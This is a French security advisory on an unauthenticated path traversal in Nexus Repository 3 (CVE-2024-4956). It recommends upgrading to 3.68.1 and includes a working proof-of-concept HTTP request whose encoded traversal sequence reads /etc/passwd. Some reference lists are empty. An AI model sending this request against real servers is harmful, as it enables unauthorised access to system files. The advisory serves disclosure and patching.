
Traversée de chemin non authentifiée dans Nexus Repository 3
Le Nexus Repository Manager est un gestionnaire de dépôts qui organise, stocke et distribue les artefacts nécessaires au développement.
Une vulnérabilité de traversée de chemin a été découverte dans Nexus Repository 3, dans les versions antérieures à 3.68.1. Cette vulnérabilité permet à un attaquant de créer une URL pour télécharger des fichiers système en dehors du périmètre de l'application Nexus Repository, sans aucune authentification. Cela représente un risque important car cela peut exposer des fichiers système sensibles et potentiellement compromettre la sécurité de l'environnement où Nexus Repository est installé.
Il est recommandé de mettre à jour Nexus Repository vers la version 3.68.1 ou ultérieure dès que possible pour atténuer cette vulnérabilité.
Pour plus d'informations et de détails techniques sur la vulnérabilité, veuillez vous référer au lien suivant :
Références :
La vulnérabilité affecte les versions 3.0 à 3.68.0 de Sonatype Nexus Repository Manager.
La mise à niveau de Nexus Repository est l'approche recommandée pour éliminer cette vulnérabilité. Cependant, des options d'atténuation immédiates sont disponibles pour les déploiements qui ne peuvent pas être mis à jour immédiatement :
Références :
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Avec le PoC ci-dessus, il est possible de voir le fichier /etc/passwd être accédé :

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml